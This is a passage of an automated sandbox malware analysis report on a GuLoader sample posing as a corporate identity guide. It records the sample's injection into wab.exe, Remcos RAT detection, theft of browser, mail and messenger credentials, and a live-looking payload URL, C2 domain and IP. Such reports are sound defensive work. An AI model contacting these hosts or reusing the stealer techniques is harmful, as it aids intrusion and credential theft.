              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeAPI call chain: ExitProcess graph end nodegraph_4-4323
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeAPI call chain: ExitProcess graph end nodegraph_4-4328
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_11-33898
              Source: wab.exe, wab.exe, 00000007.00000002.37745505722.0000000006B53000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000007.00000003.36577115530.0000000006B02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745429732.0000000006B03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_374D2639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_6F3D1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_6F3D1B5F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D724E GetProcessHeap,7_2_374D724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D4AB4 mov eax, dword ptr fs:[00000030h]7_2_374D4AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_374D2B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_374D2639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_374D60E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E00000Jump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2CA9008Jump to behavior
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugrJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugrJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkutJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowxJump to behavior
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerE
              Source: wab.exe, wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernt.
              Source: wab.exeBinary or memory string: [2023/10/30 14:17:56 Program Manager]
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernt.ge=
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerj
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B53000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/30 14:17:56 Program Manager]
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 00000007.00000003.35528543636.0000000006B70000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.35528657135.0000000006B74000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2023/10/30 14:17:51 Program Manager]
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager@
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B53000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B36000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager943408
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager158 P
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2933 cpuid 7_2_374D2933
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_374D2264
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_00408043

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword11_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword11_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword11_2_00402DA5
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2268, type: MEMORYSTR
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		Exfiltration Over Bluetooth1
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)212
              Process Injection              		1
              DLL Side-Loading              		2
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)1
              Registry Run Keys / Startup Folder              		1
              Masquerading              		1
              Credentials In Files              		28
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		Scheduled Transfer2
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Virtualization/Sandbox Evasion              		LSA Secrets131
              Security Software Discovery              		SSH11
              Clipboard Data              		Data Transfer Size Limits112
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items212
              Process Injection              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1334254 Sample: DHRI_kurumsal kimlik rehber... Startdate: 30/10/2023 Architecture: WINDOWS Score: 100 32 ourt2949aslumes9.duckdns.org 2->32 34 gudanidevelopment.ge 2->34 36 geoplugin.net 2->36 50 Snort IDS alert for network traffic 2->50 52 Antivirus detection for URL or domain 2->52 54 Antivirus detection for dropped file 2->54 56 9 other signatures 2->56 8 DHRI_kurumsal kimlik rehberi-2023.exe 4 43 2->8         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 8->26 dropped 58 Writes to foreign memory regions 8->58 60 Maps a DLL or memory area into another process 8->60 12 wab.exe 4 17 8->12         started        signatures6 process7 dnsIp8 38 94.156.6.253, 2402, 50094, 50095 NET1-ASBG Bulgaria 12->38 40 gudanidevelopment.ge 217.147.225.69, 50093, 80 GRENA-ASTbilisiGeorgiaGE Georgia 12->40 42 geoplugin.net 178.237.33.50, 50096, 80 ATOM86-ASATOM86NL Netherlands 12->42 28 C:\Users\user\AppData\Local\...\Retarded.exe, PE32 12->28 dropped 30 C:\Users\user\AppData\Roaming\paqlgkfs.dat, data 12->30 dropped 62 Maps a DLL or memory area into another process 12->62 64 Installs a global keyboard hook 12->64 17 wab.exe 1 12->17         started        20 wab.exe 1 12->20         started        22 wab.exe 2 12->22         started        24 wab.exe 12->24         started        file9 signatures10 process11 signatures12 44 Tries to steal Instant Messenger accounts or passwords 17->44 46 Tries to harvest and steal browser information (history, passwords, etc) 17->46 48 Tries to steal Mail credentials (via file / registry access) 20->48

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              DHRI_kurumsal kimlik rehberi-2023.exe100%AviraHEUR/AGEN.1338455
              DHRI_kurumsal kimlik rehberi-2023.exe78%ReversingLabsWin32.Trojan.GuLoader

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe100%AviraHEUR/AGEN.1338455
              C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe78%ReversingLabsWin32.Trojan.GuLoader
              C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              https://go.microsoft.co0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://2542116.fls.doublecli0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
              http://gudanidevelopment.ge/IogvoayYhe139.bin100%Avira URL Cloudmalware
              https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
              http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.bin100%Avira URL Cloudmalware
              https://adservice.google.co.0%Avira URL Cloudsafe
              https://odc.offi0%Avira URL Cloudsafe
              https://odc.officeap0%Avira URL Cloudsafe
              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt0%Avira URL Cloudsafe
              https://eb2.3lif0%Avira URL Cloudsafe
              https://get.a0%Avira URL Cloudsafe
              https://contextual.med0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp_f0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://2542116.fls.double0%Avira URL Cloudsafe
              https://get3.adobe0%Avira URL Cloudsafe
              https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp0%Avira URL Cloudsafe
              http://geoplugin.net/0%Avira URL Cloudsafe
              https://contextual.medi0%Avira URL Cloudsafe
              https://get3.adobe.co0%Avira URL Cloudsafe
              http://www.ebuddy.com0%Avira URL Cloudsafe
              https://support.g0%Avira URL Cloudsafe
              https://www.adobe.cb0%Avira URL Cloudsafe
              https://tpc.g0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              gudanidevelopment.ge
              		217.147.225.69
              		truetrue
                		unknown
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown
                  ourt2949aslumes9.duckdns.org
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://gudanidevelopment.ge/IogvoayYhe139.bintrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://geoplugin.net/json.gpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://2542116.fls.doublecliwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREADwab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571642671.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571761891.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571888637.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572694606.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572506007.0000000004D96000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://adservice.google.co.wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://odc.offiwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.imvu.comrwab.exe, 00000007.00000002.37758609179.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://eb2.3lift.com/syncwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://go.microsoft.cowab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contextual.media.net/checkwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.msn.com/de-ch/https://wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.binwab.exe, 00000007.00000002.37746447305.0000000006D20000.00000004.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://eb2.3lift.com/sync?wab.exe, 0000000A.00000003.35569834685.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://support.google.com/chrome/?p=plugin_flashwab.exe, 0000000A.00000003.35579175808.0000000004683000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://googleads.g.doubleclick.net/pageawab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.msn.com/?ocid=iewab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.nirsoft.netwab.exe, 0000000A.00000002.35581482185.0000000000336000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		high
                                        https://aefd.nelreports.net/api/report?cat=bingaotakbhvBEC4.tmp.10.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://deff.nelreports.net/api/report?cat=msnbhvBEC4.tmp.10.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000007.00000002.37758609179.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.com/recaptcha/api2/aframewab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/chrome/wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.comwab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/recaptcha/apiwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtwab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://odc.officeapwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.google.com/chrome/https://wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/pawab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
